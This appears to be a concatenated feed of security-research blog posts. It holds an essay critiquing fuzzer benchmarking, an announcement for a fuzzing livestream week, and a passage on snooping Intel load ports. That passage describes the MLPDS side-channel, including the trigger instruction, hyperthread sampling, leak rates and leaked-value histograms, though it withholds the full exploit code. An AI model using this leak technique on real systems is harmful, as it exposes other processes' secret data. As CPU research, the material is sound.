<h1 id="the-case-against-monolithic-fuzzers">The case against monolithic fuzzers</h1>
<p>Learning what works is important to figure out where to invest our engineering time. Given the quality of code in fuzzing right now (often very poor), there’s a lot of things that I’d hate to see us rule out because our current methodologies do not support them. I really care about my reset times of fuzz cases, (often: the <code class="language-plaintext highlighter-rouge">fork()</code> costs), as well as determinism. In a fully deterministic environment, with fast resets, a lot of approximate strategies can be used. Trying to approximate where bytes came from in an input, flipping the bytes because you have a branch target which is interesting, and then smashing those bytes in can give good information about the relation of those bytes to the input. Hell, with fast resets and forking, you can do partial fuzzing where you <code class="language-plaintext highlighter-rouge">fork()</code> and snapshot multiple times during a fuzz case, and you can progressively fuzz “from” different points in the parser. This works especially well for protocols where you can snapshot at each packet boundary.</p>
<p>These sorts of techniques and analyses don’t really work when we have monolithic fuzzers. The performance of existing fuzzers is often quite poor (AFL <code class="language-plaintext highlighter-rouge">fork()</code>, etc), or does not support partial execution (persistent modes, libfuzzer, etc). This leads to us not being able to even research these techniques. As we keep bolting things onto existing fuzzers and treating them like big blobs, we’ll get further and further from being able to learn the isolated properties of fuzzers and find the best places to apply certain strategies.</p>
<h1 id="why-i-dont-care-much-about-fuzzer-performance-for-benchmarking">Why I don’t care much about fuzzer performance for benchmarking</h1>
<h4 id="reset-speed">Reset speed</h4>
<p>AFL <code class="language-plaintext highlighter-rouge">fork()</code> bottlenecks for me often around 10-20k execs/sec on a single core, and about 40-50k on the whole system, even with 96C/192T systems. This is largely due to just getting stuck on kernel allocations and locks. Spinning up processes is expensive, and largely out of our control. AFL allows access of the local system and kernel to the fuzz case, thus cases are not deterministic, nor are they isolated (in the case of fuzzing something with lock files). This requires using another abstraction layer like docker, which adds more overhead to the equation. My hypervisors that I use for fuzzing can reset a Windows VM 1 million times per second on a single core, and scale linearly with cores, while being deterministic. Why does this matter? Well, we’re comparing tooling which isn’t even remotely hitting the capabilities of the CPUs, rather they’re bottlenecking on the kernel. These are solvable problems, and thus, as a consumer of good ideas but not tooling, I’m interested in what works well. I can make it go fast myself.</p>
<h4 id="determinism">Determinism</h4>
<p>Most fuzzers that we work with now are not deterministic. You cannot expect instruction-for-instruction determinism between cases. This makes it a lot harder to use complex fuzzing strategies which may rely on the results of a prior execution being identical to a future one. This is largely an engineering problem, and can be solved in both system-level and app-level targets.</p>
<h4 id="mutation-performance">Mutation performance</h4>
<p>The performance of mutators is often not what it can be. For example, <a href="https://github.com/google/honggfuzz">honggfuzz</a> used (now fixed, cheers!) temporary allocations during multiple passes. During its <code class="language-plaintext highlighter-rouge">mangle_MemSwap</code> it made a copy of the chunk that was to be swapped, performing 3 memcpys and using a temporary allocation. This logic was able to be implemented using a single memcpy and without a dynamic allocation. This is not a criticism of <a href="https://github.com/google/honggfuzz">honggfuzz</a>, but more of an important note of how development often occurs. Early prototyping, success, and rare revisiting of what can be changed. What’s my point here? Well, the mutation strategies in many fuzzers may introduce timing properties that are not fundamentally required to have identical behaviors. There’s nothing wrong with this, but it is additional noise which factors into time-based benchmarks. This means a good strategy can be hurt by a bad implementation, or, just a naive one that was done early on. This is noise that I think is big to remove from analysis such that we can try to learn what ideas work, and engineer them later.</p>
<p>Further, I don’t know of any mutational fuzzer which doesn’t mutate in-place. This means the multiple splices and removals from an input must end up <code class="language-plaintext highlighter-rouge">memcpy()</code>ing the remainder. This is a very common mutation pass. This means the fuzzer exponentially slows down WRT the input file size. Something we see almost every fuzzer put insane restrictions on (AFL has a fit if you give it anything but a tiny file).</p>
<p>There’s nothing stopping us from making a tree-based fuzzer where a splice adds a node to the tree and updates metadata on other nodes. The input could be serialized once when it’s ready to be consumed, or even better, serialized on-demand, only providing the parts of the file which actually were used during the fuzz case.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Example:
Initial input: "foobar", tree is [pointer to "foobar", length 6]
Splice "baz" at 3: [pointer to "foo", length 3][pointer to "baz", length 3][pointer to "bar", length 3]
Program read()s 3 bytes, return "foo" without serializing the rest
Program crashes, tree can be saved or even just what has read can be saved
</code></pre></div></div>
<p>In this, the cost is N updates to some basic metadata, where N is the number of mutations performed on that input (often 5-10). On a new fuzz case, you start with an initial input in one node of the tree, and you can once again split it up as needed. Pretty much no <code class="language-plaintext highlighter-rouge">memcpys()</code> need to be performed, nor allocations, as the input can be extended such that in-memory it’s “foobarbaz”, but the metadata describes that the “baz” should come between “foo”, and “bar”.</p>
<p>Restructuring the way we do mutations like this allows us to probably easily find 10x improvements in mutator performance (read, not overall fuzzer performance). Meaning, I don’t really want the cost of the mutator to be part of the equation, because once again, it’s likely a result of laziness or simplicity. If something really brings a strategy to the table that is excellent, we can likely make it work just as fast (but likely even faster), than existing strategies.</p>
<p>Not to note the value in potentially knowing which mutations were used during prior cases, and you could potentially mutate this tree (eg, change a splice from 5 bytes to 8 bytes, without changing the offset, just changing the node in the mutation tree). This could also be used as a mechanism to dynamically weight mutation strategies based on yields, while still getting a performance <em>gain</em> over the naive implementation.</p>
<h4 id="performance-conclusion">Performance conclusion</h4>
<p>From previous work with fuzzers, most of the reset, overhead, and corruption logic is likely not even within an order of magnitude of the possible performance. Thus, I’m far more interested in figuring out what and where strategies work, as the implementations of them are typically not indicative of their performance.</p>
<p>BUT! I recognize the value in treating them as whole systems. I’m a bit more on the hard-core engineering side of the problem. I’m interested in which strategies work, not which tools. There’s definitely value in knowing which tools will work best, given you don’t have the time to tweak or rebuild them yourself. That being said, I think scaling is much more important here, as I don’t know of really anyone doing single-core fuzzing. The results of these fuzzers at scale is likely dramatically different from single-core, and would put some major pressure on some more theoretical ideas which produce way too much information to consume and handle.</p>
<h1 id="reconstructing-the-full-picture-from-data">Reconstructing the full picture from data</h1>
<p>The data I would like to see <a href="https://github.com/google/fuzzbench">fuzzbench</a> give, and I’d give you some massive props for doing it, would be the raw, microsecond-timestamped information for each coverage gained.</p>
<p>This means, every time coverage increases, a new CSV record (or whatever format) is generated, including the time stamp when it was found (to the microsecond), as well as the fuzz iteration ID which indicates how many inputs have been run into the fuzzer. This should also include a unique identifier of the block which was found.</p>
<p>This means, in post, the entire progress of the fuzzer can be reconstructed. Every edge, which edges they were, the times they were found, and the case ID they were on when they were found allows comparing not only the raw “edge count” but also the differences between edges found. It’s crazy that this information is not part of the benchmark, as almost all the fuzzers could be finding nearly the same coverage, but a fuzzer which finds less coverage, but completely unique edges, would be devalued.</p>
<p>This is the firehose of data, but since it’s not collected on an interval, it very quickly turns into almost no data.</p>
<h4 id="hard-problem-what-is-coverage">Hard problem: What is coverage?</h4>
<p>This leads to a really hard problem. How do we compare coverage between tools? Can we safely create a unique block identifier which is universal between all the fuzzers and their targets. I have no idea how <a href="https://github.com/google/fuzzbench">fuzzbench</a> solves this (or even if it does). If <a href="https://github.com/google/fuzzbench">fuzzbench</a> is relying on the fuzzers to have roughly the same idea of what an edge is, I’d say the results are completely invalid. Having different passes which add different coverage gathering, compare information gathering, could easily affect the graphs. Even just non-determinism in clang (or whatever compiler) would make me uneasy about if <code class="language-plaintext highlighter-rouge">afl-clang</code> binaries have identical graph shapes to <code class="language-plaintext highlighter-rouge">libfuzzer-clang</code> binaries.</p>
<p>If <a href="https://github.com/google/fuzzbench">fuzzbench</a> does solve this problem, I’m curious as to how. I’d anticipate it would be through a coverage pass which is standardized between all targets. If this is the case, are they using the same binaries? If they’re not, are the binaries deterministic, or can the fuzzers affect the benchmark coverage information due to adding their own compiler instrumentation.</p>
<p>Further, if this is the case, it makes it much harder to compare emulators or other tools which gather their own coverage in a unique way. For example, if my emulators, which get coverage for effectively free, had to run an instrumented binary for <a href="https://github.com/google/fuzzbench">fuzzbench</a> to get data, it’s not a realistic comparison. My fuzzer would be penalized twice for coverage gathering, even though it doesn’t need the instrumented binary.</p>
<p>Maybe someone solved this problem, and I’m curious what the solution is. TL;DR: Are we actually comparing the same binaries with identical graphs, and is this fair to fuzzers which do not need compile-time instrumentation.</p>
<h1 id="the-end">The end</h1>
<p>Can’t wait for more discussion. You have been very receptive even when I’m often a bit strongly opinion-ed. I respect that a lot.</p>
<p>Stay cute,</p>
<p>gamozo</p>ForewardFuzz Week 20202020-07-12T07:11:15+00:002020-07-12T07:11:15+00:00https://gamozolabs.github.io/2020/07/12/fuzz_week_2020<h1 id="summary">Summary</h1>
<p>Welcome to fuzz week 2020! This week (July 13th - July 17th) I’ll be streaming
every day going through some of the very basics of fuzzing all the way to
cutting edge research. I want to use this time to talk about some things
related to fuzzing, particularly when it comes to benchmarking and comparing
fuzzers with each other.</p>
<h1 id="schedule">Schedule</h1>
<p>Ha. There’s really no schedule, there is no script, there is no plan, but
here’s a rough outline of what I want to cover.</p>
<p>I will be streaming on my <a href="https://twitch.tv/gamozo">Twitch channel</a> at approximately
<a href="https://www.timeanddate.com/worldclock/fixedtime.html?msg=Fuzz+Week+Approx+Stream+Start&iso=20200713T14&p1=234">14:00 PST</a>. But things aren’t really going to be on a strict schedule.</p>
<p>My <a href="https://twitter.com/gamozolabs">Twitter</a> is probably the best source of information for when
things are about to start.</p>
<p>Everything will be recorded and uploaded to my <a href="https://www.youtube.com/user/gamozolabs">YouTube</a>.</p>
<h4 id="july-13th">July 13th</h4>
<p>The very basics of fuzzing. We’ll write our own fuzzer and tweak it to improve
it. We’ll probably start by writing it in Python, and eventually talk about the
performance ramifications and the basics of scaling fuzzers by using threads or
multiple processes. We’ll also compare our newly written fuzzer against AFL and
see where AFL outperforms it, and also where AFL has some blind spots.</p>
<h4 id="july-14th">July 14th</h4>
<p>Here we’ll cover code coverage. We might get to this sooner, who knows. But
we’re going to write our own tooling to gather code coverage information such
that we can see not only how easy it is to set up, but how flexible coverage
information can be while still proving quite useful!</p>
<h4 id="july-15th-17th">July 15th-17th</h4>
<p>Here we’ll focus mainly on the advanced aspects of fuzzing. While this sounds
complex, fuzzing really hasn’t become that complex yet, so follow along! We’ll
go through some of the more deep performance properties of fuzzing, mainly
focused around snapshot fuzzing.</p>
<p>Once we’ve discussed some basics of performance and snapshot fuzzing, we’ll
start talking about the meaningfulness of comparing fuzzers. Namely, the
difficulties in comparing fuzzers when they may involve different concepts of
what a crash, coverage, or input are. We’ll look at some existing examples of
papers which compare fuzzers, and see how well they actually prove their point.</p>
<h1 id="biases">Biases</h1>
<p>I think it’s important when doing something like this, to make it clear what my
existing biases are. I’ve got a few.</p>
<ul>
<li>I think existing fuzzers have some major performance problems and struggle to
scale. I consider this to be a high priority as general performance
improvements to fuzzing harnesses makes both generic fuzzers (eg. AFL,
context-unaware fuzzers) and hand-crafted (targeted) fuzzers better.</li>
<li>I don’t think outperforming AFL is impressive. AFL is impressive because it’s
got an easy-to-use workflow, which makes it accessible to many different
users, broadening the amount of targets it has been used against.</li>
<li>I don’t really thinking comparing fuzzers is reasonable.</li>
<li>I think it is very easy to over-fit a fuzzer to small programs, or add
unrealistic amounts of information extraction from a target under test, in a
way that the concepts are not generally applicable to many targets that
exceed basic parsers. I think this is where a lot of current research falls.</li>
</ul>
<p>But… that’s mainly the point of this week. To either find out my biases are
wildly incorrect, or to maybe demonstrate why I have some of the biases. So,
how will I address some of these (in order of prior bullets)?</p>
<ul>
<li>I’ll compare some of my fuzzers against AFL. We’ll see if we can outperform
AFL in terms of raw fuzz cases performed, as well as the results (coverage
and crashes).</li>
<li>I’ll try to demonstrate that a basic fuzzer with 1/100th the amount of code
of AFL is capable of getting much better results, and that it’s really not
that hard to write.</li>
<li>I’ll propose some techniques that can be used to compare fuzzers, and go
through my own personal process of evaluating fuzzers. I’m not trying to get
papers, or funding, or anything. I don’t really have an interest in making
things look comparatively better. If they perform differently, but have
different use cases, I’d rather understand those cases and apply them
specifically rather than have a one-shoe-fits-all solution.</li>
<li>I’ll go through some instrumentation that I’ve historically added to my
fuzzers which give them massive result and coverage boosts, but consume so
much information that they cannot meaningfully scale past tiny pieces of
code. I’ll go through when these things may actually be useful, as sometimes
isolating components is viable. I’ll also go through some existing papers and
see what sorts of results are being claimed, and if they actually have
general applicability.</li>
</ul>
<h1 id="winging-it">Winging it</h1>
<p>It’s important to note, nothing here is scheduled. Things may go much faster,
slower, or just never happen. That’s the beauty of research. I may be very
wrong with some of my biases, and we’ll hopefully correct those. I love being
wrong.</p>
<p>I’ve maybe thought of having some fuzzing figureheads pop on the stream for
random discussions/conversations/interviews. If this is something that sounds
interesting to you, reach out and we can maybe organize it!</p>
<h1 id="sound-fun">Sound fun?</h1>
<p>See you there :)</p>
<hr />SummaryCPU Introspection: Intel Load Port Snooping2019-12-30T04:11:15+00:002019-12-30T04:11:15+00:00https://gamozolabs.github.io/metrology/2019/12/30/load-port-monitor<p><img src="/assets/loadseq_example.png" alt="Load sequence example" /></p>
<p><em><sub>Frequencies of observed values over time from load ports. Here we’re
seeing the processor internally performing a microcode-assisted page table walk
to update accessed and dirty bits. Only one load was performed by the user,
these are all “invisible” loads done behind the scenes</sub></em></p>
<h1 id="twitter">Twitter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when
new blogs come up. I often will post data and graphs from data as it comes in
and I learn!</p>
<hr />
<h1 id="foreward">Foreward</h1>
<p>First of all, I’d like to say that I’m super excited to write up this blog.
This is an idea I’ve had for over a year and I only recently got to working on.
The initial implementation and proof-of-concept of this idea was actually
implemented live on my <a href="https://twitch.tv/gamozo">Twitch</a>! This proof-of-concept went from
nothing at all to a fully-working-as-predicted implementation in just about 3
hours! Not only did the implementation go much smoother than expected, the
results are by far higher resolution and signal-to-noise than I expected!</p>
<p>This blog is fairly technical, and thus I highly recommend that you read my
<a href="/metrology/2019/08/19/sushi_roll.html">previous blog on Sushi Roll</a>, my CPU research kernel where this
technique was implemented. In the Sushi Roll blog I go a little bit more into
the high-level details of Intel micro-architecture and it’s a great
introduction to the topic if you’re not familiar.</p>
<p><a href="https://www.youtube.com/watch?v=_oE4_ShKQL8"><img src="https://img.youtube.com/vi/_oE4_ShKQL8/0.jpg" alt="YouTube video for PoC
implementation" /></a></p>
<p><em><sub>Recording of the stream where we implemented this idea as a
proof-of-concept. Click for the YouTube video!</sub></em></p>
<hr />
<h1 id="summary">Summary</h1>
<p>We’re going to go into a unique technique for observing and sequencing all load
port traffic on Intel processors. By using a CPU vulnerability from the MDS set
of vulnerabilities, specifically multi-architectural load port data sampling
(MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load
ports. Since (to my knowledge) all loads must end up going through load ports,
regardless of requestor, origin, or caching, this means in theory, all contents
of loads ever performed can be observed. By using a creative scanning
technique we’re able to not only view “random” loads as they go by, but
sequence loads to determine the ordering and timing of them.</p>
<p>We’ll go through some examples demonstrating that this technique can be used to
view all loads as they are performed on a cycle-by-cycle basis. We’ll look
into an interesting case of the micro-architecture updating accessed and dirty
bits using a microcode assist. These are invisible loads dispatched on the CPU
on behalf of the user when a page is accessed for the first time.</p>
<h1 id="why">Why</h1>
<p>As you may be familiar, x86 is quite a complex architecture with many nooks and
crannies. As time has passed it has only gotten more complex, leading to fewer
known behaviors of the inner workings. There are many instructions with complex
microcode invocations which access memory as were seen through my work on Sushi
Roll. This led to me being curious as to what is actually going on with load
ports during some of these operations.</p>
<p><img src="/assets/graph_write_nodirtyupdate.png" alt="Intel CPU traffic during a normal
write" /></p>
<p><em><sub>Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4)
during a traditional memory write</sub></em></p>
<p><img src="/assets/graph_write_dirtyupdate.png" alt="Intel CPU traffic during a write requiring dirty/accessed
updates" /></p>
<p><em><sub>Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4)
during the same memory write as above, but this time where the page table
entries need an accessed/dirty bit update</sub></em></p>
<p>Beyond just directly invoked microcode due to instructions being executed,
microcode also gets executed on the processor during “microcode assists”. These
operations, while often undocumented, are referenced a few times throughout
Intel manuals. Specifically in the Intel Optimization Manual there are
references to microcode assists during accessed and dirty bit updates. Further,
there is a restriction on TSX sections such that they may abort when accessed
and dirty bits need to be updated. These microcode assists are fascinating to
me, as while I have no evidence for it, I suspect they may be subject to
different levels of permissions and validations compared to traditional
operations. Whenever I see code executing on a processor as a side-effect to
user operations, all I think is: “here be dragons”.</p>
<hr />
<h1 id="a-playground-for-cpu-bugs">A playground for CPU bugs</h1>
<p>When I start auditing a target, the first thing that I try to do is get
introspection into what is going on. If the target is an obscure device then
I’ll likely try to find some bug that allows me to image the entire device, and
load it up in an emulator. If it’s some source code I have that is partial,
then I’ll try to get some sort of mocking of the external calls it’s making and
implement them as I come by them. Once I have the target running on <em>my</em> terms,
and not the terms of some locked down device or environment, then I’ll start
trying to learn as much about it as possible…</p>
<p>This is no different from what I did when I got into CPU research. Starting
with when Meltdown and Spectre came out I started to be the go-to person for
writing PoCs for CPU bugs. I developed a few custom OSes early on that were
just designed to give a pass/fail indicator if a CPU bug were able to be
exploited in a given environment. This was critical in helping test the
mitigations that went in place for each CPU bug as they were reported, as
testing if these mitigations worked is a surprisingly hard problem.</p>
<p>This led to me having some cleanly made OS-level CPU exploits written up. The
custom OS proved to be a great way to test the mitigations, especially as the
signal was much higher compared to a traditional OS. In fact, the signal was
almost just a bit too strong…</p>
<p>When in a custom operating system it’s a lot easier to play around with weird
behaviors of the CPU, without worrying about it affecting the system’s
stability. I can easily turn off interrupts, overwrite exception handlers with
specialized ones, change MSRs to weird CPU states, and so on. This led to me
ending up with almost a playground for CPU vulnerability testing with some
pretty standard primitives.</p>
<p>As the number of primitives I had grew, I was able to PoC out a new CPU bug in
typically under a day. But then I had to wonder… what would happen if I tried
to get the most information out of the processor as possible.</p>
<hr />
<h1 id="sushi-roll">Sushi Roll</h1>
<p>And that was the starting of Sushi Roll, my CPU research kernel. I have a whole
<a href="/metrology/2019/08/19/sushi_roll.html">blog about the Sushi Roll research kernel</a>, and I strongly
recommend you read it! Effectively Sushi Roll is a custom kernel with message
passing between cores rather than memory sharing. This means that each core has
a complete copy of the kernel with no shared accesses. For attacks which need
to observe the faintest signal in memory behaviors, this lead to a great amount
of isolation.</p>
<p>When looking for a behavior you already understand on a processor, it’s pretty
easy to get a signal. But, when doing initial CPU research into the unknowns
and undefined behavior, getting this signal out takes every advantage as you
can get. Thus in this low-noise CPU research environment, even the faintest
leak would cause a pretty large disruption in determinism, which would likely
show up as a measurable result earlier than traditional blind CPU research
would allow.</p>
<h4 id="performance-counter-monitoring">Performance Counter Monitoring</h4>
<p>In Sushi Roll I implemented a creative technique for monitoring the values in
performance counters along with time-stamping them in cycles. Some of the
performance counters in Intel processors count things like the number of
micro-ops dispatched to each of the execution units on the core. Some of these
counters increase during speculation, and with this data and time-stamping I was
able to get some of the first-ever insights into what processor behavior was
actually occurring during speculation!</p>
<p><img src="/assets/example_profiling.png" alt="Example uarch activity" />
<em><sub>Example cycle-by-cycle profiling of the Kaby Lake micro-architecture,
warning: log-scale y-axis</sub></em></p>
<p>Being able to collect this sort of data immediately made unexpected CPU
behaviors easier to catalog, measure, and eventually make determinstic. The
more understanding we can get of the internals of the CPU, the better!</p>
<hr />
<h1 id="the-ultimate-goal">The Ultimate Goal</h1>
<p>The ultimate goal of my CPU research is to understand so thoroughly how the
Intel micro-architecture works that I can predict it with emulation models.
This means that I would like to run code through an emulated environment and it
would tell me exactly how many internal CPU resources would be used, which
lines from caches and buffers would be evicted and what contents they would
hold. There’s something beautiful to me to understanding something so well that
you can predict how it will behave. And so the journey begins…</p>
<h1 id="past-progress">Past Progress</h1>
<p>So far with the work in Sushi Roll we’ve been able to observe how the CPU
dispatches uops during specific portions of code. This allows us to see which
CPU resources are used to fulfill certain requests, and thus can provide us
with a rough outline of what is happening. With simple CPU operations this is
often all we need, as there are only so many ways to perform a certain
operation, the complete picture can usually be drawn just from guessing “how
they might have done it”. However, when more complex operations are involved,
all of that goes out the window.</p>
<p>When reading through Intel manuals I saw many references to microcode assists.
These are “situations” in your processor which may require microcode to be
dispatched to execution units to perform some complex-ish logic. These are
typically edge cases which don’t occur frequently enough for the processor to
worry about handling them in hardware, rather just needing to detect them and
cause some assist code to run. We know of one microcode assist which is
relatively easy to trigger, updating the accessed and dirty bits in the page
tables.</p>
<h4 id="accessed-and-dirty-bits">Accessed and dirty bits</h4>
<p>In the Intel page table (and honestly most other architectures) there’s a
concept of accessed and dirty bits. These bits indicate whether or not a page
has ever been translated (accessed), or if it has been written to (dirtied). On
Intel it’s a little strange as there is only a dirty bit on the final page
table entry. However, the accessed bits are present on each level of the page
table during the walk. I’m quite familiar with these bits from my work with
hypervisor-based fuzzing as it allows high performance differential resetting
of VMs by simply walking the page tables and restoring pages that were dirtied
to their original state of a snapshot.</p>
<p>But this leads to an curiosity… what is the mechanic responsible for setting
these bits? Does the internal page table silicon set these during a page table
walk? Are they set after the fact? Are they atomically set? Are they set during
speculation or faulting loads?</p>
<p>From Intel manuals and some restrictions with TSX it’s pretty obvious that
accessed and dirty bits are a bit of an anomaly. TSX regions will abort when
memory is touched that does not have the respective accessed or dirty bits set.
Which is strange, why would this be a limitation of the processor?</p>
<p><img src="/assets/tsx_intel_manual.png" alt="TSX aborts during accessed and dirty bit
updates" /></p>
<p><em><sub>Accessed and dirty bits causing TSX aborts from the Intel® 64 and IA-32
architectures optimization reference manual</sub></em></p>
<p>… weird huh? Testing it out yields exactly what the manual says. If I write
up some sample code which accesses memory which doesn’t have the respective
accessed or dirty bits set, it aborts <em>every time</em>!</p>
<h1 id="whats-next">What’s next?</h1>
<p>So now we have an ability to view what operation types are being performed on
the processor. However this doesn’t tell us a huge amount of information. What
we would really benefit from would be knowing the data contents that are being
operated on. We can pretty easily log the data we are fetching in our own
code, but that won’t give us access to the internal loads that happen as side
effects on the processor, nor would it tell us about the contents of loads
which happen during speculation.</p>
<p>Surely there’s no way to view all loads which happen on the processor right?
Almost anything during speculation is a pain to observe, and even if we could
observe the data it’d be quite noisy.</p>
<p>Or maybe there is a way…</p>
<h1 id="-a-way">… a way?</h1>
<p>Fortunately there may indeed be a way! A while back I found a CPU
vulnerability which allowed for random values to be sampled off of the load
ports. While this vulnerability is initially thought to only allow for random
values to be sampled from the load ports, perhaps we can get a bit more
creative about leaking…</p>
<hr />
<h1 id="multi-architectural-load-port-data-sampling-mlpds">Multi-Architectural Load Port Data Sampling (MLPDS)</h1>
<p>Multi-architectural load port data sampling sounds like an overly complex name,
but it’s actually quite simple in the end. It’s a set of CPU flaws in Intel
processors which allow a user to potentially get access to stale data recently
transferred through load ports. This was actually a bug that I reported to
Intel a while back and they ended up finding a few similar issues with
different instruction combinations, this is ultimately what comprises MLPDS.</p>
<p><img src="/assets/mlpds_intel_desc.png" alt="MLPDS Intel Description" /></p>
<p><em>Description of MLPDS from <a href="https://software.intel.com/security-software-guidance/insights/deep-dive-intel-analysis-microarchitectural-data-sampling">Intel’s MDS DeepDive</a></em></p>
<p>The specific bug that I found was initially called “cache line split” or “cache
line split load” and it’s exactly what you might expect. When a data access
straddles a cache line (multi-byte load containing some bytes on one cache line
and the remaining bytes on another). Cache lines are 64-bytes in size so any
multi-byte memory access to an address with the bottom 6 bits set would cause
this behavior. These accesses must also cause a fault or an assist, but by
using TSX it’s pretty easy to get whatever behavior you would like.</p>
<p>This bug is largely an issue when hyper-threading is enabled as this allows a
sibling thread to be executing protected/privileged code while another thread
uses this attack to observe recently loaded data.</p>
<p>I found this bug when working on early PoCs of L1TF when we were assessing the
impact it had. In my L1TF PoC (which was using random virtual addresses each
attempt) I ended up disabling the page table modification. This ultimately is
the root requirement for L1TF to work, and to my surprise, I was still seeing
a signal. I initially thought it was some sort of CPU bug leaking registers as
the value I was leaking was never actually read in my code. It turns out what I
ended up observing was the hypervisor itself context switching my VM. What I
was leaking was the contents of the registers as they were loaded during the
context switch!</p>
<p>Unfortunately MLPDS has a <em>really</em> complex PoC…</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</code></pre></div></div>
<p>After this instruction executes and it faults or aborts, the contents of
<code class="language-plaintext highlighter-rouge">rax</code> during a small speculative window will potentially contain stale data
from load ports. That’s all it takes!</p>
<p>From this point it’s just some trickery to get the 64-bit value leaked during
the speculative window!</p>
<hr />
<h1 id="its-all-too-random">It’s all too random</h1>
<p>Okay, so MLPDS allows us to sample a “random” value which was recently loaded
on the load ports. This is a great start as we could probably run this attack
over and over and see what data is observed on a sample piece of code. Using
hyper-threading for this attack will be ideal because we can have one thread
running some sample code in an infinite loop, while the other code observes the
values seen on the load port.</p>
<h1 id="an-mlpds-exploit">An MLPDS exploit</h1>
<p>Since there isn’t yet a public exploit for MLPDS, especially with the data
rates we’re going to use here, I’m just going to go over the high-level details
and not show how it’s implemented under the hood.</p>
<p>For this MLPDS exploit I use a couple different primitives. One is a pretty
basic exploit which simply attempts to leak the raw contents of the value which
was leaked. This value that we leak is always 64-bits, but we can chose to only
leak a few of the bytes from it (or even bit-level granularity). There’s a
performance increase for the fewer bytes that we leak as it decreases the
number of cache lines we need to prime-and-probe each attempt.</p>
<p>There’s also another exploit type that I use that allows me to look for a
specific value in memory, which turns the leak from a multi-byte leak to just a
boolean “was value/wasn’t value”. This is the highest performance version due
to how little information has to be leaked past the speculative window.</p>
<p>All of these leaks will leak a specific value from a single speculative run.
For example if we were to leak a 64-bit value, the 64-bit value will be from
one MLPDS exploit and one speculative window. Getting an entire 64-bit value
out during a single speculative window is a surprisingly hard problem, and I’m
going to keep that as my own special sauce for a while. Compared to many public
CPU leak exploits, this attack does not loop multiple times using masks to
slowly reveal a value, it will get revealed from a single attempt. This is
critical to us as otherwise we wouldn’t be able to observe values which are
loaded once.</p>
<p>Here’s some of the leak rate numbers for the current version of MLPDS that I’m
using:</p>
<table>
<thead>
<tr>
<th>Leak type</th>
<th>Leaks/second</th>
</tr>
</thead>
<tbody>
<tr>
<td>Known 64-bit value</td>
<td>5,979,278</td>
</tr>
<tr>
<td>8-bit any value</td>
<td>228,479</td>
</tr>
<tr>
<td>16-bit any value</td>
<td>116,023</td>
</tr>
<tr>
<td>24-bit any value</td>
<td>25,175</td>
</tr>
<tr>
<td>32-bit any value</td>
<td>13,726</td>
</tr>
<tr>
<td>40-bit any value</td>
<td>12,713</td>
</tr>
<tr>
<td>48-bit any value</td>
<td>10,297</td>
</tr>
<tr>
<td>56-bit any value</td>
<td>9,521</td>
</tr>
<tr>
<td>64-bit any value</td>
<td>8,234</td>
</tr>
</tbody>
</table>
<p>It’s important to note that the known 64-bit value search is much faster than
all of the others. We’ll make some good use of this later!</p>
<h4 id="test">Test</h4>
<p>Let’s try out a simple MLPDS attack on a small piece of code which loops
forever fetching 2 values from memory.</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x12345678f00dfeed</span>
<span class="nf">mov</span> <span class="p">[</span><span class="mh">0x1000</span><span class="p">],</span> <span class="nb">rax</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x1337133713371337</span>
<span class="nf">mov</span> <span class="p">[</span><span class="mh">0x1008</span><span class="p">],</span> <span class="nb">rax</span>
<span class="err">2:</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="mh">0x1000</span><span class="p">]</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="mh">0x1008</span><span class="p">]</span>
<span class="nf">jmp</span> <span class="mi">2</span><span class="nv">b</span>
</code></pre></div></div>
<p>This code should in theory just causes two loads. One of a value
<code class="language-plaintext highlighter-rouge">0x12345678f00dfeed</code> and another of a value <code class="language-plaintext highlighter-rouge">0x1337133713371337</code>. Lets spin
this up on a hardware thread and have the sibling thread perform MLPDS in a
loop! We’ll use our 64-bit any value MLPDS attack and just histogram all of the
different values we observe get leaked.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sampling done:
0x12345678f00dfeed : 100532
0x1337133713371337 : 99217
</code></pre></div></div>
<p>Viola! Here we see the two different secret values on the attacking thread, at
a pretty much comparable frequency.</p>
<p>Cool… so now we have a technique that will allow us to see the contents of
all loads on load ports, but randomly sampled only. Let’s take a look at the
weird behaviors during accessed bit updates by clearing the accessed bit on the
final level page tables every loop in the same code above.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sampling done:
0x0000000000000008 : 559
0x0000000000000009 : 2316
0x000000000000000a : 142
0x000000000000000e : 251
0x0000000000000010 : 825
0x0000000000000100 : 19
0x0000000000000200 : 3
0x0000000000010006 : 438
0x000000002cc8c000 : 3796
0x000000002cc8c027 : 225
0x000000002cc8d000 : 112
0x000000002cc8d027 : 57
0x000000002cc8e000 : 1
0x000000002cc8e027 : 35
0x00000000ffff8bc2 : 302
0x00002da0ea6a5b78 : 1456
0x00002da0ea6a5ba0 : 2034
0x0000700dfeed0000 : 246
0x0000700dfeed0008 : 5081
0x0000930000000000 : 4097
0x00209b0000000000 : 15101
0x1337133713371337 : 2028
0xfc91ee000008b7a6 : 677
0xffff8bc2fc91b7c4 : 2658
0xffff8bc2fc9209ed : 4565
0xffff8bc2fc934019 : 2
</code></pre></div></div>
<p>Whoa! That’s a lot more values than we saw before. They weren’t from just the two
values we’re loading in a loop, to many other values. Strangely the <code class="language-plaintext highlighter-rouge">0x1234...</code>
value is missing as well. Interesting. Well since we know these are accessed
bit updates, perhaps some of these are entries from the page table walk. Let’s
look at the addresses of the page table entry we’re hitting.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CR3 0x630000
PML4E 0x2cc8e007
PDPE 0x2cc8d007
PDE 0x2cc8c007
PTE 0x13370003
